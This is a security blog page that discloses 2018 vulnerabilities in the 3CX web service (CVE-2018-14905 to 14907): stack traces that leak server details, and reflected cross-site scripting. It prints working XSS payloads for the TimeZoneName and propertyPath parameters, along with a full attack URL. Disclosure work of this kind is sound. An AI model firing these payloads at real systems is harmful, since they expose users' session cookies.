⚙️
Grizzlysec
  • Android & IOS Pentesting
    • 🙉Jailmonkey Android Bypass
    • 🍻In-Depth Rootbeer SDK Bypass (Native) pt 1
    • 🍻In-Depth Rootbeer SDK Bypass (Native) pt 2
    • 🍃Flutter SSL Pinning Bypass, the hard way
    • 🔐Using Frida to decrypt sensitive information in mobile applications requests pt 1
  • Exploitation Attack & Defenses
    • 👾RCE via Buffer Overflow - AceaXeFTP [CVE-2019-19782]
    • 👾Exploitation Protections From Old To Bleeding Edge pt 1
    • 👾Exploitation Protections From Old To Bleeding Edge pt 2
    • 👾Exploitation Protections From Old To Bleeding Edge pt 3
  • Web & Random Sec
    • 🔎Security Issues on Ajenti.
    • 🔎Security Issue On PRTG Network Manager.
  • 🔎Security Issues on Eramba
  • 🔎Security Issues on 3cx Web Service
  • 🔎Security Issues on Samsung Syncthru Web Service
Powered by GitBook
On this page
  • The issues Found:
  • 1) Multiple Improper error Handling
  • 2) Reflected Cross Site Script
  • 3) Cross Site Script on Stack trace

Security Issues on 3cx Web Service

some CVEs found by me and my bros 2018 when i was a Jr

PreviousSecurity Issues on ErambaNextSecurity Issues on Samsung Syncthru Web Service

Last updated 2 years ago

Me and my coworkers, Ricardo Fajin, Daniel Chactoura, Lucas Carmo, Kelvin Clark, Found some issues on the famous pabx 3cx .

The issues Found:

  1. Multiple Improper error Handling

  2. Cross Site Scripting Reflected

  3. Cross Site Scripting on Stack trace

1) Multiple Improper error Handling

Researching the application we found several traceback errors. As an explample the error below. this could be especially dangerous because it gives, several informations about the server itself.

2) Reflected Cross Site Script

Payload used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: TimeZoneName

3) Cross Site Script on Stack trace

URL: https://<ip>:5001/#/app/ivr_editor/4

Payload Used: <img src=`%00`&NewLine; onerror=alert(document.cookie)&NewLine;

Parameter: propertyPath

CVEs Related to this article:

CVE-2018–14905

CVE-2018–14906

CVE-2018–14907

Evidence of the stack trace

URL:

Evidence of the reflected XSS
Evidence of the stack trace XSS 1
Evidence of the stack trace XSS 2
🔎
https://<IP>:<Port>/api/CallLog?TimeZoneName=<script>alert(document.cookie)</script>&callState=All&dateRangeType=Today&fromFilter=&fromFilterType=Any&numberOfRows=200&searchFilter=&startRow=0&toFilter=&toFilterType=Any